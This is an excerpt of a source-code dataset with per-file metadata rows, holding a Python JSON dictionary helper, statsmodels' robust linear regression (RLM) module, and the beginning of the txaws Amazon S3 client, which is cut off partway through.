| apache-2.0 | -5,756,347,737,831,524,000 | 32.271429 | 77 | 0.576986 | false |
ondoheer/GOT-english | libraries/jsonDict.py | 4 | 1934 | __author__ = 'ondoheer'
class JSONDictionary(object):
"""Creates a dictionary object that works with JSON-structured
dictionaries; it takes one such dictionary as an initialization parameter.
It adds extra dictionary functionality such as key searching and
retrieval of a specific key's value, no matter how deeply nested the
value is or what kind of object it is."""
dictionary = None
def __init__(self, dictionary):
'''initializes with a dictionary as argument'''
self.dictionary = dictionary
def listKeys(self, *args):
'''Lists every key in the object, no matter how deeply nested it is.'''
if len(args) < 1:
innerDict = self.dictionary
else:
innerDict = args[0]
dictKeys = []
for key, value in innerDict.iteritems():
try:
dictKeys.append(key)
except TypeError:
pass
try:
results = self.listKeys(value)
for result in results:
dictKeys.append(result)
except AttributeError:
pass
return dictKeys
def getKeyValue(self, keyToSearch, *args):
'''Searches the whole tree for a specific key and returns its value.
Keys should be unique within the object, otherwise you cannot know
which occurrence's value has been returned.'''
if len(args) < 1:
dictionary = self.dictionary
else:
dictionary = args[0]
if keyToSearch in dictionary:
return dictionary[keyToSearch]
for key, value in dictionary.iteritems():
try:
item = self.getKeyValue(keyToSearch, value)
if item is not None:
return item
except:
pass
def findKey(self, keyToSearch):
'''Returns True if the key exists anywhere in the object.'''
return keyToSearch in self.listKeys()
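# Illustrative usage sketch (hypothetical data, not part of the library):
#
#   >>> d = JSONDictionary({"user": {"profile": {"name": "Ada"}}})
#   >>> sorted(d.listKeys())
#   ['name', 'profile', 'user']
#   >>> d.getKeyValue("name")
#   'Ada'
#   >>> d.findKey("missing")
#   False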
| gpl-2.0 | -4,777,922,465,718,618,000 | 31.779661 | 73 | 0.574457 | false |
detrout/debian-statsmodels | statsmodels/robust/robust_linear_model.py | 27 | 25571 | """
Robust linear models with support for the M-estimators listed under
:ref:`norms <norms>`.
References
----------
PJ Huber. 'Robust Statistics' John Wiley and Sons, Inc., New York. 1981.
PJ Huber. 1973, 'The 1972 Wald Memorial Lectures: Robust Regression:
Asymptotics, Conjectures, and Monte Carlo.' The Annals of Statistics,
1.5, 799-821.
R Venables, B Ripley. 'Modern Applied Statistics in S' Springer, New York,
2002.
"""
from statsmodels.compat.python import string_types
import numpy as np
import scipy.stats as stats
from statsmodels.tools.decorators import (cache_readonly,
resettable_cache)
import statsmodels.regression.linear_model as lm
import statsmodels.robust.norms as norms
import statsmodels.robust.scale as scale
import statsmodels.base.model as base
import statsmodels.base.wrapper as wrap
from statsmodels.compat.numpy import np_matrix_rank
__all__ = ['RLM']
def _check_convergence(criterion, iteration, tol, maxiter):
return not (np.any(np.fabs(criterion[iteration] -
criterion[iteration-1]) > tol) and iteration < maxiter)
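# The helper above reports convergence as soon as every element of the chosen
# criterion changes by at most `tol` between successive iterations, or once
# `maxiter` is reached, whichever happens first.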
class RLM(base.LikelihoodModel):
__doc__ = """
Robust Linear Models
Estimate a robust linear model via iteratively reweighted least squares
given a robust criterion estimator.
%(params)s
M : statsmodels.robust.norms.RobustNorm, optional
The robust criterion function for downweighting outliers.
The current options are LeastSquares, HuberT, RamsayE, AndrewWave,
TrimmedMean, Hampel, and TukeyBiweight. The default is HuberT().
See statsmodels.robust.norms for more information.
%(extra_params)s
Notes
-----
**Attributes**
df_model : float
The degrees of freedom of the model. The number of regressors p less
one for the intercept. Note that the reported model degrees
of freedom does not count the intercept as a regressor, though
the model is assumed to have an intercept.
df_resid : float
The residual degrees of freedom. The number of observations n
less the number of regressors p. Note that here p does include
the intercept as using a degree of freedom.
endog : array
See above. Note that endog is a reference to the data so that if
data is already an array and it is changed, then `endog` changes
as well.
exog : array
See above. Note that endog is a reference to the data so that if
data is already an array and it is changed, then `endog` changes
as well.
M : statsmodels.robust.norms.RobustNorm
See above. Robust estimator instance instantiated.
nobs : float
The number of observations n
pinv_wexog : array
The pseudoinverse of the design / exogenous data array. Note that
RLM has no whiten method, so this is just the pseudo inverse of the
design.
normalized_cov_params : array
The p x p normalized covariance of the design / exogenous data.
This is approximately equal to (X.T X)^(-1)
Examples
---------
>>> import statsmodels.api as sm
>>> data = sm.datasets.stackloss.load()
>>> data.exog = sm.add_constant(data.exog)
>>> rlm_model = sm.RLM(data.endog, data.exog,
M=sm.robust.norms.HuberT())
>>> rlm_results = rlm_model.fit()
>>> rlm_results.params
array([ 0.82938433, 0.92606597, -0.12784672, -41.02649835])
>>> rlm_results.bse
array([ 0.11100521, 0.30293016, 0.12864961, 9.79189854])
>>> rlm_results_HC2 = rlm_model.fit(cov="H2")
>>> rlm_results_HC2.params
array([ 0.82938433, 0.92606597, -0.12784672, -41.02649835])
>>> rlm_results_HC2.bse
array([ 0.11945975, 0.32235497, 0.11796313, 9.08950419])
>>>
>>> rlm_hamp_hub = sm.RLM(data.endog, data.exog,
M=sm.robust.norms.Hampel()).fit(
sm.robust.scale.HuberScale())
>>> rlm_hamp_hub.params
array([ 0.73175452, 1.25082038, -0.14794399, -40.27122257])
""" % {'params' : base._model_params_doc,
'extra_params' : base._missing_param_doc}
def __init__(self, endog, exog, M=norms.HuberT(), missing='none',
**kwargs):
self.M = M
super(base.LikelihoodModel, self).__init__(endog, exog,
missing=missing, **kwargs)
self._initialize()
#things to remove_data
self._data_attr.extend(['weights', 'pinv_wexog'])
def _initialize(self):
"""
Initializes the model for the IRLS fit.
Resets the history and number of iterations.
"""
self.pinv_wexog = np.linalg.pinv(self.exog)
self.normalized_cov_params = np.dot(self.pinv_wexog,
np.transpose(self.pinv_wexog))
self.df_resid = (np.float(self.exog.shape[0] -
np_matrix_rank(self.exog)))
self.df_model = np.float(np_matrix_rank(self.exog)-1)
self.nobs = float(self.endog.shape[0])
def score(self, params):
raise NotImplementedError
def information(self, params):
raise NotImplementedError
def predict(self, params, exog=None):
"""
Return linear predicted values from a design matrix.
Parameters
----------
params : array-like, optional after fit has been called
Parameters of a linear model
exog : array-like, optional.
Design / exogenous data. Model exog is used if None.
Returns
-------
An array of fitted values
Notes
-----
If the model as not yet been fit, params is not optional.
"""
#copied from linear_model
if exog is None:
exog = self.exog
return np.dot(exog, params)
def loglike(self, params):
raise NotImplementedError
def deviance(self, tmp_results):
"""
Returns the (unnormalized) log-likelihood from the M estimator.
"""
return self.M((self.endog - tmp_results.fittedvalues) /
tmp_results.scale).sum()
def _update_history(self, tmp_results, history, conv):
history['params'].append(tmp_results.params)
history['scale'].append(tmp_results.scale)
if conv == 'dev':
history['deviance'].append(self.deviance(tmp_results))
elif conv == 'sresid':
history['sresid'].append(tmp_results.resid/tmp_results.scale)
elif conv == 'weights':
history['weights'].append(tmp_results.model.weights)
return history
def _estimate_scale(self, resid):
"""
Estimates the scale based on the option provided to the fit method.
"""
if isinstance(self.scale_est, str):
if self.scale_est.lower() == 'mad':
return scale.mad(resid, center=0)
if self.scale_est.lower() == 'stand_mad':
return scale.mad(resid)
else:
raise ValueError("Option %s for scale_est not understood" %
self.scale_est)
elif isinstance(self.scale_est, scale.HuberScale):
return self.scale_est(self.df_resid, self.nobs, resid)
else:
return scale.scale_est(self, resid)**2
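# Scale options above: 'mad' uses the median absolute deviation about zero,
# the deprecated 'stand_mad' centres at the median first, and a HuberScale
# instance applies Huber's proposal 2 to the residuals; any other object
# falls through to scale.scale_est(...) with the result squared.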
def fit(self, maxiter=50, tol=1e-8, scale_est='mad', init=None, cov='H1',
update_scale=True, conv='dev'):
"""
Fits the model using iteratively reweighted least squares.
The IRLS routine runs until the specified objective converges to `tol`
or `maxiter` has been reached.
Parameters
----------
conv : string
Indicates the convergence criteria.
Available options are "coefs" (the coefficients), "weights" (the
weights in the iteration), "sresid" (the standardized residuals),
and "dev" (the un-normalized log-likelihood for the M
estimator). The default is "dev".
cov : string, optional
'H1', 'H2', or 'H3'
Indicates how the covariance matrix is estimated. Default is 'H1'.
See rlm.RLMResults for more information.
init : string
Specifies method for the initial estimates of the parameters.
Default is None, which means that the least squares estimate
is used. Currently it is the only available choice.
maxiter : int
The maximum number of iterations to try. Default is 50.
scale_est : string or HuberScale()
'mad' or HuberScale()
Indicates the estimate to use for scaling the weights in the IRLS.
The default is 'mad' (median absolute deviation. Other options are
'HuberScale' for Huber's proposal 2. Huber's proposal 2 has
optional keyword arguments d, tol, and maxiter for specifying the
tuning constant, the convergence tolerance, and the maximum number
of iterations. See statsmodels.robust.scale for more information.
tol : float
The convergence tolerance of the estimate. Default is 1e-8.
update_scale : Bool
If `update_scale` is False then the scale estimate for the
weights is held constant over the iteration. Otherwise, it
is updated for each fit in the iteration. Default is True.
Returns
-------
results : object
statsmodels.rlm.RLMresults
"""
if not cov.upper() in ["H1","H2","H3"]:
raise ValueError("Covariance matrix %s not understood" % cov)
else:
self.cov = cov.upper()
conv = conv.lower()
if not conv in ["weights","coefs","dev","sresid"]:
raise ValueError("Convergence argument %s not understood" \
% conv)
self.scale_est = scale_est
if (isinstance(scale_est,
string_types) and scale_est.lower() == "stand_mad"):
from warnings import warn
warn("stand_mad is deprecated and will be removed in 0.7.0",
FutureWarning)
wls_results = lm.WLS(self.endog, self.exog).fit()
if not init:
self.scale = self._estimate_scale(wls_results.resid)
history = dict(params = [np.inf], scale = [])
if conv == 'coefs':
criterion = history['params']
elif conv == 'dev':
history.update(dict(deviance = [np.inf]))
criterion = history['deviance']
elif conv == 'sresid':
history.update(dict(sresid = [np.inf]))
criterion = history['sresid']
elif conv == 'weights':
history.update(dict(weights = [np.inf]))
criterion = history['weights']
# done one iteration so update
history = self._update_history(wls_results, history, conv)
iteration = 1
converged = 0
while not converged:
self.weights = self.M.weights(wls_results.resid/self.scale)
wls_results = lm.WLS(self.endog, self.exog,
weights=self.weights).fit()
if update_scale is True:
self.scale = self._estimate_scale(wls_results.resid)
history = self._update_history(wls_results, history, conv)
iteration += 1
converged = _check_convergence(criterion, iteration, tol, maxiter)
results = RLMResults(self, wls_results.params,
self.normalized_cov_params, self.scale)
history['iteration'] = iteration
results.fit_history = history
results.fit_options = dict(cov=cov.upper(), scale_est=scale_est,
norm=self.M.__class__.__name__, conv=conv)
#norm is not changed in fit, no old state
#doing the next causes exception
#self.cov = self.scale_est = None #reset for additional fits
#iteration and history could contain wrong state with repeated fit
return RLMResultsWrapper(results)
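# Minimal usage sketch for the IRLS options above (endog/exog hypothetical):
#
#   >>> model = RLM(endog, exog, M=norms.TukeyBiweight())
#   >>> res = model.fit(conv="weights", scale_est=scale.HuberScale(), cov="H2")
#   >>> res.fit_history["iteration"], res.params
#
# conv only changes which sequence is monitored for convergence; the
# estimator itself is always the M-estimator supplied through `M`.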
class RLMResults(base.LikelihoodModelResults):
"""
Class to contain RLM results
Returns
-------
**Attributes**
bcov_scaled : array
p x p scaled covariance matrix specified in the model fit method.
The default is H1. H1 is defined as
``k**2 * (1/df_resid*sum(M.psi(sresid)**2)*scale**2)/
((1/nobs*sum(M.psi_deriv(sresid)))**2) * (X.T X)^(-1)``
where ``k = 1 + (df_model +1)/nobs * var_psiprime/m**2``
where ``m = mean(M.psi_deriv(sresid))`` and
``var_psiprime = var(M.psi_deriv(sresid))``
H2 is defined as
``k * (1/df_resid) * sum(M.psi(sresid)**2) *scale**2/
((1/nobs)*sum(M.psi_deriv(sresid)))*W_inv``
H3 is defined as
``1/k * (1/df_resid * sum(M.psi(sresid)**2)*scale**2 *
(W_inv X.T X W_inv))``
where `k` is defined as above and
``W_inv = (M.psi_deriv(sresid) exog.T exog)^(-1)``
See the technical documentation for cleaner formulae.
bcov_unscaled : array
The usual p x p covariance matrix with scale set equal to 1. It
is then just equivalent to normalized_cov_params.
bse : array
An array of the standard errors of the parameters. The standard
errors are taken from the robust covariance matrix specified in the
argument to fit.
chisq : array
An array of the chi-squared values of the paramter estimates.
df_model
See RLM.df_model
df_resid
See RLM.df_resid
fit_history : dict
Contains information about the iterations. Its keys are `deviance`,
`params`, `iteration` and the convergence criteria specified in
`RLM.fit`, if different from `deviance` or `params`.
fit_options : dict
Contains the options given to fit.
fittedvalues : array
The linear predicted values. dot(exog, params)
model : statsmodels.rlm.RLM
A reference to the model instance
nobs : float
The number of observations n
normalized_cov_params : array
See RLM.normalized_cov_params
params : array
The coefficients of the fitted model
pinv_wexog : array
See RLM.pinv_wexog
pvalues : array
The p values associated with `tvalues`. Note that `tvalues` are assumed to be distributed
standard normal rather than Student's t.
resid : array
The residuals of the fitted model. endog - fittedvalues
scale : float
The type of scale is determined in the arguments to the fit method in
RLM. The reported scale is taken from the residuals of the weighted
least squares in the last IRLS iteration if update_scale is True. If
update_scale is False, then it is the scale given by the first OLS
fit before the IRLS iterations.
sresid : array
The scaled residuals.
tvalues : array
The "t-statistics" of params. These are defined as params/bse where bse are taken
from the robust covariance matrix specified in the argument to fit.
weights : array
The reported weights are determined by passing the scaled residuals
from the last weighted least squares fit in the IRLS algortihm.
See also
--------
statsmodels.model.LikelihoodModelResults
"""
def __init__(self, model, params, normalized_cov_params, scale):
super(RLMResults, self).__init__(model, params,
normalized_cov_params, scale)
self.model = model
self.df_model = model.df_model
self.df_resid = model.df_resid
self.nobs = model.nobs
self._cache = resettable_cache()
#for remove_data
self.data_in_cache = ['sresid']
self.cov_params_default = self.bcov_scaled
#TODO: "pvals" should come from chisq on bse?
@cache_readonly
def fittedvalues(self):
return np.dot(self.model.exog, self.params)
@cache_readonly
def resid(self):
return self.model.endog - self.fittedvalues # before bcov
@cache_readonly
def sresid(self):
return self.resid/self.scale
@cache_readonly
def bcov_unscaled(self):
return self.normalized_cov_params
@cache_readonly
def weights(self):
return self.model.weights
@cache_readonly
def bcov_scaled(self):
model = self.model
m = np.mean(model.M.psi_deriv(self.sresid))
var_psiprime = np.var(model.M.psi_deriv(self.sresid))
k = 1 + (self.df_model+1)/self.nobs * var_psiprime/m**2
if model.cov == "H1":
return k**2 * (1/self.df_resid*\
np.sum(model.M.psi(self.sresid)**2)*self.scale**2)\
/((1/self.nobs*np.sum(model.M.psi_deriv(self.sresid)))**2)\
*model.normalized_cov_params
else:
W = np.dot(model.M.psi_deriv(self.sresid)*model.exog.T,
model.exog)
W_inv = np.linalg.inv(W)
# [W_jk]^-1 = [SUM(psi_deriv(Sr_i)*x_ij*x_jk)]^-1
# where Sr are the standardized residuals
if model.cov == "H2":
# These are correct, based on Huber (1973) 8.13
return k*(1/self.df_resid)*np.sum(\
model.M.psi(self.sresid)**2)*self.scale**2\
/((1/self.nobs)*np.sum(\
model.M.psi_deriv(self.sresid)))*W_inv
elif model.cov == "H3":
return k**-1*1/self.df_resid*np.sum(\
model.M.psi(self.sresid)**2)*self.scale**2\
*np.dot(np.dot(W_inv, np.dot(model.exog.T,model.exog)),\
W_inv)
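# H1 above rescales the usual (X'X)^-1 by a robust variance ratio, while H2
# and H3 are the sandwich-style forms based on Huber (1973, eq. 8.13) built
# around W = sum(psi'(sresid_i) x_i x_i'); all three reduce to the OLS
# covariance when psi is the identity and the weights are constant.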
@cache_readonly
def pvalues(self):
return stats.norm.sf(np.abs(self.tvalues))*2
@cache_readonly
def bse(self):
return np.sqrt(np.diag(self.bcov_scaled))
@cache_readonly
def chisq(self):
return (self.params/self.bse)**2
def remove_data(self):
super(self.__class__, self).remove_data()
#self.model.history['sresid'] = None
#self.model.history['weights'] = None
remove_data.__doc__ = base.LikelihoodModelResults.remove_data.__doc__
def summary(self, yname=None, xname=None, title=0, alpha=.05,
return_fmt='text'):
"""
This is for testing the new summary setup
"""
from statsmodels.iolib.summary import (summary_top,
summary_params, summary_return)
## left = [(i, None) for i in (
## 'Dependent Variable:',
## 'Model type:',
## 'Method:',
## 'Date:',
## 'Time:',
## 'Number of Obs:',
## 'df resid',
## 'df model',
## )]
top_left = [('Dep. Variable:', None),
('Model:', None),
('Method:', ['IRLS']),
('Norm:', [self.fit_options['norm']]),
('Scale Est.:', [self.fit_options['scale_est']]),
('Cov Type:', [self.fit_options['cov']]),
('Date:', None),
('Time:', None),
('No. Iterations:', ["%d" % self.fit_history['iteration']])
]
top_right = [('No. Observations:', None),
('Df Residuals:', None),
('Df Model:', None)
]
if not title is None:
title = "Robust linear Model Regression Results"
#boiler plate
from statsmodels.iolib.summary import Summary
smry = Summary()
smry.add_table_2cols(self, gleft=top_left, gright=top_right, #[],
yname=yname, xname=xname, title=title)
smry.add_table_params(self, yname=yname, xname=xname, alpha=alpha,
use_t=self.use_t)
#diagnostic table is not used yet
# smry.add_table_2cols(self, gleft=diagn_left, gright=diagn_right,
# yname=yname, xname=xname,
# title="")
#add warnings/notes, added to text format only
etext =[]
wstr = \
'''If the model instance has been used for another fit with different fit
parameters, then the fit options might not be the correct ones anymore.'''
etext.append(wstr)
if etext:
smry.add_extra_txt(etext)
return smry
def summary2(self, xname=None, yname=None, title=None, alpha=.05,
float_format="%.4f"):
"""Experimental summary function for regression results
Parameters
-----------
xname : List of strings of length equal to the number of parameters
Names of the independent variables (optional)
yname : string
Name of the dependent variable (optional)
title : string, optional
Title for the top table. If not None, then this replaces the
default title
alpha : float
significance level for the confidence intervals
float_format: string
print format for floats in parameters summary
Returns
-------
smry : Summary instance
this holds the summary tables and text, which can be printed or
converted to various output formats.
See Also
--------
statsmodels.iolib.summary.Summary : class to hold summary
results
"""
# Summary
from statsmodels.iolib import summary2
smry = summary2.Summary()
smry.add_base(results=self, alpha=alpha, float_format=float_format,
xname=xname, yname=yname, title=title)
return smry
class RLMResultsWrapper(lm.RegressionResultsWrapper):
pass
wrap.populate_wrapper(RLMResultsWrapper, RLMResults)
if __name__=="__main__":
#NOTE: This is to be removed
#Delivery Time Data is taken from Montgomery and Peck
import statsmodels.api as sm
#delivery time(minutes)
endog = np.array([16.68, 11.50, 12.03, 14.88, 13.75, 18.11, 8.00, 17.83,
79.24, 21.50, 40.33, 21.00, 13.50, 19.75, 24.00, 29.00, 15.35, 19.00,
9.50, 35.10, 17.90, 52.32, 18.75, 19.83, 10.75])
#number of cases, distance (Feet)
exog = np.array([[7, 3, 3, 4, 6, 7, 2, 7, 30, 5, 16, 10, 4, 6, 9, 10, 6,
7, 3, 17, 10, 26, 9, 8, 4], [560, 220, 340, 80, 150, 330, 110, 210, 1460,
605, 688, 215, 255, 462, 448, 776, 200, 132, 36, 770, 140, 810, 450, 635,
150]])
exog = exog.T
exog = sm.add_constant(exog)
# model_ols = models.regression.OLS(endog, exog)
# results_ols = model_ols.fit()
# model_ramsaysE = RLM(endog, exog, M=norms.RamsayE())
# results_ramsaysE = model_ramsaysE.fit(update_scale=False)
# model_andrewWave = RLM(endog, exog, M=norms.AndrewWave())
# results_andrewWave = model_andrewWave.fit(update_scale=False)
# model_hampel = RLM(endog, exog, M=norms.Hampel(a=1.7,b=3.4,c=8.5)) # convergence problems with scale changed, not with 2,4,8 though?
# results_hampel = model_hampel.fit(update_scale=False)
#######################
### Stack Loss Data ###
#######################
from statsmodels.datasets.stackloss import load
data = load()
data.exog = sm.add_constant(data.exog)
#############
### Huber ###
#############
# m1_Huber = RLM(data.endog, data.exog, M=norms.HuberT())
# results_Huber1 = m1_Huber.fit()
# m2_Huber = RLM(data.endog, data.exog, M=norms.HuberT())
# results_Huber2 = m2_Huber.fit(cov="H2")
# m3_Huber = RLM(data.endog, data.exog, M=norms.HuberT())
# results_Huber3 = m3_Huber.fit(cov="H3")
##############
### Hampel ###
##############
# m1_Hampel = RLM(data.endog, data.exog, M=norms.Hampel())
# results_Hampel1 = m1_Hampel.fit()
# m2_Hampel = RLM(data.endog, data.exog, M=norms.Hampel())
# results_Hampel2 = m2_Hampel.fit(cov="H2")
# m3_Hampel = RLM(data.endog, data.exog, M=norms.Hampel())
# results_Hampel3 = m3_Hampel.fit(cov="H3")
################
### Bisquare ###
################
# m1_Bisquare = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results_Bisquare1 = m1_Bisquare.fit()
# m2_Bisquare = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results_Bisquare2 = m2_Bisquare.fit(cov="H2")
# m3_Bisquare = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results_Bisquare3 = m3_Bisquare.fit(cov="H3")
##############################################
# Huber's Proposal 2 scaling #
##############################################
################
### Huber'sT ###
################
m1_Huber_H = RLM(data.endog, data.exog, M=norms.HuberT())
results_Huber1_H = m1_Huber_H.fit(scale_est=scale.HuberScale())
# m2_Huber_H
# m3_Huber_H
# m4 = RLM(data.endog, data.exog, M=norms.HuberT())
# results4 = m1.fit(scale_est="Huber")
# m5 = RLM(data.endog, data.exog, M=norms.Hampel())
# results5 = m2.fit(scale_est="Huber")
# m6 = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results6 = m3.fit(scale_est="Huber")
# print """Least squares fit
#%s
#Huber Params, t = 2.
#%s
#Ramsay's E Params
#%s
#Andrew's Wave Params
#%s
#Hampel's 17A Function
#%s
#""" % (results_ols.params, results_huber.params, results_ramsaysE.params,
# results_andrewWave.params, results_hampel.params)
| bsd-3-clause | -7,524,098,930,800,713,000 | 36.494135 | 137 | 0.583865 | false |
mithrandi/txaws | txaws/s3/client.py | 1 | 32831 | # Copyright (C) 2008 Tristan Seligmann <[email protected]>
# Copyright (C) 2009 Canonical Ltd
# Copyright (C) 2009 Duncan McGreggor <[email protected]>
# Copyright (C) 2012 New Dream Network (DreamHost)
# Licenced under the txaws licence available at /LICENSE in the txaws source.
"""
Client wrapper for Amazon's Simple Storage Service.
API stability: unstable.
Various API-incompatible changes are planned in order to expose missing
functionality in this wrapper.
"""
from io import BytesIO
import datetime
import mimetypes
import warnings
from operator import itemgetter
from incremental import Version
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.web.http import datetimeToString
from twisted.web.http_headers import Headers
from twisted.web.client import FileBodyProducer
from twisted.internet import task
import hashlib
from hashlib import sha256
from urllib import urlencode, unquote
from dateutil.parser import parse as parseTime
from txaws.client.base import (
_URLContext, BaseClient, BaseQuery, error_wrapper,
RequestDetails, query,
)
from txaws.s3.acls import AccessControlPolicy
from txaws.s3.model import (
Bucket, BucketItem, BucketListing, ItemOwner, LifecycleConfiguration,
LifecycleConfigurationRule, NotificationConfiguration, RequestPayment,
VersioningConfiguration, WebsiteConfiguration, MultipartInitiationResponse,
MultipartCompletionResponse)
from txaws import _auth_v4
from txaws.s3.exception import S3Error
from txaws.service import AWSServiceEndpoint, REGION_US_EAST_1, S3_ENDPOINT
from txaws.util import XML
def _to_dict(headers):
return {k: vs[0] for (k, vs) in headers.getAllRawHeaders()}
def s3_error_wrapper(error):
error_wrapper(error, S3Error)
class S3Client(BaseClient):
"""A client for S3."""
def __init__(self, creds=None, endpoint=None, query_factory=None,
receiver_factory=None, agent=None, utcnow=None,
cooperator=None):
if query_factory is None:
query_factory = query
self.agent = agent
self.utcnow = utcnow
if cooperator is None:
cooperator = task
self._cooperator = cooperator
super(S3Client, self).__init__(creds, endpoint, query_factory,
receiver_factory=receiver_factory)
def _submit(self, query):
d = query.submit(self.agent, self.receiver_factory, self.utcnow)
d.addErrback(s3_error_wrapper)
return d
def _query_factory(self, details, **kw):
return self.query_factory(credentials=self.creds, details=details, **kw)
def _details(self, **kw):
body = kw.pop("body", None)
body_producer = kw.pop("body_producer", None)
amz_headers = kw.pop("amz_headers", {})
# It makes no sense to specify both. That makes it ambiguous
# what data should make up the request body.
if body is not None and body_producer is not None:
raise ValueError("data and body_producer are mutually exclusive")
# If the body was specified as a string, we can compute a hash
# of it and sign the hash along with the rest. That protects
# against replay attacks with different content.
#
# If the body was specified as a producer, we can't really do
# this. :( The producer may generate large amounts of data
# which we can't hold in memory and it may not be replayable.
# AWS requires the signature in the header so there's no way
# to both hash/sign and avoid buffering everything in memory.
#
# The saving grace is that we'll only issue requests over TLS
# after verifying the AWS certificate and requests with a date
# (included in the signature) more than 15 minutes in the past
# are rejected. :/
if body is not None:
content_sha256 = sha256(body).hexdigest().decode("ascii")
body_producer = FileBodyProducer(BytesIO(body), cooperator=self._cooperator)
elif body_producer is None:
# Just as important is to include the empty content hash
# for all no-body requests.
content_sha256 = sha256(b"").hexdigest().decode("ascii")
else:
# Tell AWS we're not trying to sign the payload.
content_sha256 = None
return RequestDetails(
region=REGION_US_EAST_1,
service=b"s3",
body_producer=body_producer,
amz_headers=amz_headers,
content_sha256=content_sha256,
**kw
)
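# For reference, the empty-payload digest computed above is the well-known
# constant:
#
#   >>> hashlib.sha256(b"").hexdigest()
#   'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
#
# and passing content_sha256=None signals that a streamed payload is not
# covered by the signature.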
def _url_context(self, *a, **kw):
return s3_url_context(self.endpoint, *a, **kw)
def _headers(self, content_type):
if content_type is None:
return Headers()
return Headers({u"content-type": [content_type]})
def list_buckets(self):
"""
List all buckets.
Returns a list of all the buckets owned by the authenticated sender of
the request.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(),
)
query = self._query_factory(details)
d = self._submit(query)
d.addCallback(self._parse_list_buckets)
return d
def _parse_list_buckets(self, (response, xml_bytes)):
"""
Parse XML bucket list response.
"""
root = XML(xml_bytes)
buckets = []
for bucket_data in root.find("Buckets"):
name = bucket_data.findtext("Name")
date_text = bucket_data.findtext("CreationDate")
date_time = parseTime(date_text)
bucket = Bucket(name, date_time)
buckets.append(bucket)
return buckets
def create_bucket(self, bucket):
"""
Create a new bucket.
"""
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket),
)
query = self._query_factory(details)
return self._submit(query)
def delete_bucket(self, bucket):
"""
Delete a bucket.
The bucket must be empty before it can be deleted.
"""
details = self._details(
method=b"DELETE",
url_context=self._url_context(bucket=bucket),
)
query = self._query_factory(details)
return self._submit(query)
def get_bucket(self, bucket, marker=None, max_keys=None):
"""
Get a list of all the objects in a bucket.
@param marker: If given, indicate a position in the overall
results where the results of this call should begin. The
first result is the first object that sorts greater than
this marker.
@type marker: L{bytes} or L{NoneType}
@param max_keys: If given, the maximum number of objects to
return.
@type max_keys: L{int} or L{NoneType}
@return: A L{Deferred} that fires with a L{BucketListing}
describing the result.
@see: U{http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketGET.html}
"""
args = []
if marker is not None:
args.append(("marker", marker))
if max_keys is not None:
args.append(("max-keys", "%d" % (max_keys,)))
if args:
object_name = "?" + urlencode(args)
else:
object_name = None
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_get_bucket)
return d
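# Pagination note: is_truncated on the parsed BucketListing is the raw
# "true"/"false" text from the response, so a caller walking a large bucket
# would re-issue get_bucket with marker set to the key of the last item
# returned (roughly listing.contents[-1].key in txaws's model) and max_keys
# as desired, until is_truncated comes back "false".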
def _parse_get_bucket(self, (response, xml_bytes)):
root = XML(xml_bytes)
name = root.findtext("Name")
prefix = root.findtext("Prefix")
marker = root.findtext("Marker")
max_keys = root.findtext("MaxKeys")
is_truncated = root.findtext("IsTruncated")
contents = []
for content_data in root.findall("Contents"):
key = content_data.findtext("Key")
date_text = content_data.findtext("LastModified")
modification_date = parseTime(date_text)
etag = content_data.findtext("ETag")
size = content_data.findtext("Size")
storage_class = content_data.findtext("StorageClass")
owner_id = content_data.findtext("Owner/ID")
owner_display_name = content_data.findtext("Owner/DisplayName")
owner = ItemOwner(owner_id, owner_display_name)
content_item = BucketItem(key, modification_date, etag, size,
storage_class, owner)
contents.append(content_item)
common_prefixes = []
for prefix_data in root.findall("CommonPrefixes"):
common_prefixes.append(prefix_data.text)
return BucketListing(name, prefix, marker, max_keys, is_truncated,
contents, common_prefixes)
def get_bucket_location(self, bucket):
"""
Get the location (region) of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the bucket's region.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?location"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_bucket_location)
return d
def _parse_bucket_location(self, (response, xml_bytes)):
"""Parse a C{LocationConstraint} XML document."""
root = XML(xml_bytes)
return root.text or ""
def get_bucket_lifecycle(self, bucket):
"""
Get the lifecycle configuration of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the bucket's lifecycle
configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?lifecycle"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_lifecycle_config)
return d
def _parse_lifecycle_config(self, (response, xml_bytes)):
"""Parse a C{LifecycleConfiguration} XML document."""
root = XML(xml_bytes)
rules = []
for content_data in root.findall("Rule"):
id = content_data.findtext("ID")
prefix = content_data.findtext("Prefix")
status = content_data.findtext("Status")
expiration = int(content_data.findtext("Expiration/Days"))
rules.append(
LifecycleConfigurationRule(id, prefix, status, expiration))
return LifecycleConfiguration(rules)
def get_bucket_website_config(self, bucket):
"""
Get the website configuration of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the bucket's website
configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name='?website'),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_website_config)
return d
def _parse_website_config(self, (response, xml_bytes)):
"""Parse a C{WebsiteConfiguration} XML document."""
root = XML(xml_bytes)
index_suffix = root.findtext("IndexDocument/Suffix")
error_key = root.findtext("ErrorDocument/Key")
return WebsiteConfiguration(index_suffix, error_key)
def get_bucket_notification_config(self, bucket):
"""
Get the notification configuration of a bucket.
@param bucket: The name of the bucket.
        @return: A C{Deferred} that will fire with the bucket's notification
configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?notification"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_notification_config)
return d
def _parse_notification_config(self, (response, xml_bytes)):
"""Parse a C{NotificationConfiguration} XML document."""
root = XML(xml_bytes)
topic = root.findtext("TopicConfiguration/Topic")
